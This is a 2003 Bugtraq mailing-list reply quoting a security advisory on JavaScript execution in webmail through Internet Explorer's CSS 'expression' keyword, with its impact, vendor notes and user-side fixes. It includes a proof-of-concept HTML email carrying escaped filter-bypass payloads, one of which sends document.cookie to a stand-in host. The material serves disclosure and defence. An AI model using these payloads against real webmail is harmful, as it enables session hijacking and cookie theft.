RE: Webmails + Internet Explorer can create unwanted javascript execution
Yahoo has a massive userbase (with good reason).
This kind of bug could potentially turn some IE security issues into a more
readily mail borne attack. This could be bad. Very bad.
I do not see that you have contacted Yahoo on this.
> -----Original Message-----
> From: Jedi/Sector One [mailto:j@xxxxxxxxxxxx]
> Sent: Thursday, October 02, 2003 2:39 PM
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Subject: Webmails + Internet Explorer can create unwanted
> javascript execution
>
>
>
>
> Summary : Multiple web-based mail systems browsed through
> Internet Explorer
> can allow arbitrary javascript execution.
> Date : 02/10/2003
> Author : Frank Denis <j@xxxxxxxxxxxx>
>
>
> ------------------------[ Description ]------------------------
>
> The issue described here doesn't reveal a vulnerability in
> a specific product. But the combination of features of
> Internet Explorer with features of common webmail software
> can create a vulnerability.
>
> 1) Internet Explorer interprets stylesheets for any HTML tag,
> even non-existent ones. For instance :
>
> <xbody style="...">
>
> is not a valid tag, but attributes are evaluated.
>
> It may be considered as a bug or as a logical behavior,
> your mileage may vary. And this alone is not a security flaw.
>
> 2) Internet Explorer can evaluate Javascript expressions in
> style sheets through the "expression" keyword :
>
> <style type="text/css">
> a {
> width: expression(6 * 9 + 'px');
> }
> </style>
>
> This is not a bug either, but a proprietary, properly
> documented extension.
>
> 3) Due to the increase of HTML-only email, most popular
> webmail software can display HTML email. In this context,
> Javascript _must_ be removed from every email. To achieve
> this result, various tricks are used by webmail software :
>
> - Removal or mangling of <script> tags,
>
> - Removal or mangling of "javascript:" urls.
>
> - Removal or mangling of properties like "onmouseover".
>
>
> ------------------------[ Vulnerability
> ]------------------------
>
> By combining 2) with 3) and if the webmail doesn't filter
> out stylesheets nor the "expression" keyword, any Javascript
> contained in a message will be executed as soon as the
> recipient will display it.
>
> Some webmail software are aware of that issue for a while
> and they are mangling or filtering any occurrence of
> "expression". However, the mangling may not work when the
> name of the property is escaped (like "e\xpression") as CSS
> permits. Or it may not work in the context of
> non-existent-because- mangled tags. The former worked on
> Yahoo! until yesterday (the issue was fixed quickly after
> being reported, they are nice and reactive guys).
>
> But most software simply don't know about "expression".
> They are _not_ faulty, though. This is not a bug nor a
> vulnerability. "expression" is a proprietary extension.
> Webmails don't have to know about every possible implication
> of every proprietary extension of every version of every
> browser out there.
>
> However, when the following conditions are met, the
> Javascript is executed :
>
> - "expression" keywords aren't filtered/mangled by the
> webmail software.
>
> - The client software is Internet Explorer.
>
> - Javascript isn't disabled in the client software.
> Unfortunately, a lot of public webmail systems simply don't
> work when Javascript is disabled.
>
>
> ------------------------[ Impact ]------------------------
>
> Depending on the webmail software, complete control of the
> client's session may be possible. Private mail can be deleted
> or bounced to evil addresses, cookies and session identifiers
> can be stolen, etc.
>
>
> ------------------------[ Proof of concept
> ]------------------------
>
> Webmail software like to filter or mangle stylesheets. Some
> software totally remove everything inside <head>...</head>
> tags. Some software totally remove <body>...</body> tags
> (possibly killing style info by the way) instead of
> converting them to something like <div>...</div>. Some
> software totally remove <style>...</style> definitions but
> accept inline css.
> This is bad, because it encourages people to send broken
> HTML 3 code instead of well-formed, accessible XHTML documents.
> The following HTML email tries to add workarounds for this
> kind of filters in order to test whether the "expression"
> keyword that properly gets evaluated on Internet Explorer. It
> currently works at least with IE 6 + Squirrelmail, Yahoo! and
> the software of a dozen public and ISP webmail services I
> have an account on.
>
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
> "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd";>
> <html xmlns="http://www.w3.org/1999/xhtml"; xml:lang="fr"> <head>
> <title>Webmail test</title>
> <meta http-equiv="Content-Type"
> content="text/html;charset=ISO-8859-1" /> </head> <body
> style="width:expres\sion(alert(1))">
> <style type="text/css">
> h1 {
> he\ight:e\xpression(alert(2));
>
> bac\kground-image:e\xpression('url(http://example.org/'+d
> ocument.cookie+$
> }
> </style>
> <h1 style="width:expression(alert(3))">...</h1>
> <div id="just-for-fun">
> <a href="javascript:window.open(document.location);"
> onmouseover="alert(4)">fireworks</a>
> </div>
> </body>
> </html>
>
>
> ------------------------[ Fix ]------------------------
>
> For the end user, there are four ways to avoid this issue :
>
> - Don't use Internet Explorer to connect to webmails.
> or/and
> - Disable Javascript.
> or/and
> - Configure the webmail to only display mails as plain text. or/and
> - Only connect to webmails when you are 100% sure the
> software it is powered by completely filters or mangles
> "expression" keywords and hope that software and the version
> won't change silently.
>
>
> --
> __ /*- Frank DENIS (Jedi/Sector One)
> <j@xxxxxxxxxxxxxxx> -*\ __
> \ '/ <a href="http://www.PureFTPd.Org/";> Secure FTP
> Server </a> \' /
> \/ <a href="http://www.Jedi.Claranet.Fr/";> Misc. free
> software </a> \/
>